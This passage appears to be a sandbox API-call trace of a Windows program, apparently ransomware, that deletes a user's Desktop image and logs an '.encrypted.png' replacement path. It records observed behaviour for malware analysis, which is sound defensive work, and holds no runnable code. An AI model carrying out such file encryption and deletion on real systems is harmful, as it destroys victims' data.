Flags=0x0, Size=0x4) returned 0x7da258 [0030.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0030.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x88cd30 [0030.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x88cd30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0030.869] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.869] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0030.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0030.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0030.869] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0030.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0030.869] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0030.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0030.869] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0030.869] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0030.870] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0030.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0030.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0030.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.870] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0030.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0030.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.870] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0030.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd18 [0030.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cd18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0030.870] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.870] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0030.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.870] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.871] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0030.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0030.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0030.871] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png", lpFilePart=0x0) returned 0x42 [0030.871] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf602e3f0, ftCreationTime.dwHighDateTime=0x1d5c1df, ftLastAccessTime.dwLowDateTime=0x4adcad20, ftLastAccessTime.dwHighDateTime=0x1d5bb7d, ftLastWriteTime.dwLowDateTime=0x1248ffc0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x3153, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="DQ5aP.png", cAlternateFileName="")) returned 0x7c2240 [0030.871] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\dq5ap.png")) returned 1 [0030.872] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf602e3f0, ftCreationTime.dwHighDateTime=0x1d5c1df, ftLastAccessTime.dwLowDateTime=0x4adcad20, ftLastAccessTime.dwHighDateTime=0x1d5bb7d, ftLastWriteTime.dwLowDateTime=0x1248ffc0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x3153, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="DQ5aP.png", cAlternateFileName="")) returned 0 [0030.873] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0030.873] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.873] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0030.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0030.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0030.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0030.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0030.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0030.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0030.873] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.873] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0030.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0030.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.873] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.873] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0030.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0030.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.874] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0030.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0030.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.874] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0030.874] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.874] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.874] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0030.874] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.874] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x88ffb0 [0030.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.874] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0030.874] ReadFile (in: hFile=0x128, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6aee3c*=0x595, lpOverlapped=0x0) returned 1 [0030.875] ReadFile (in: hFile=0x128, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0030.875] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x595, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.875] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0030.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0030.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.encrypted.png\r\n", cchWideChar=79, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 79 [0030.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4f) returned 0x7f36e0 [0030.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.encrypted.png\r\n", cchWideChar=79, lpMultiByteStr=0x7f36e0, cbMultiByte=79, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.encrypted.png\r\n", lpUsedDefaultChar=0x0) returned 79 [0030.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0030.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0030.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0030.875] WriteFile (in: hFile=0x128, lpBuffer=0x7f3630*, nNumberOfBytesToWrite=0x4e, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3630*, lpNumberOfBytesWritten=0x6aee3c*=0x4e, lpOverlapped=0x0) returned 1 [0030.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0030.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.875] CloseHandle (hObject=0x128) returned 1 [0030.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0030.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x936008 | out: hHeap=0x770000) returned 1 [0030.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0030.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0030.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0030.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0030.877] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0030.877] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0030.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0030.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0030.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.879] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0030.879] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.879] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0030.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0030.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.879] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0030.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af558 [0030.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0030.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0030.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0030.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0030.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0030.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cee0 [0030.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0030.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0030.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0030.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0030.879] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, 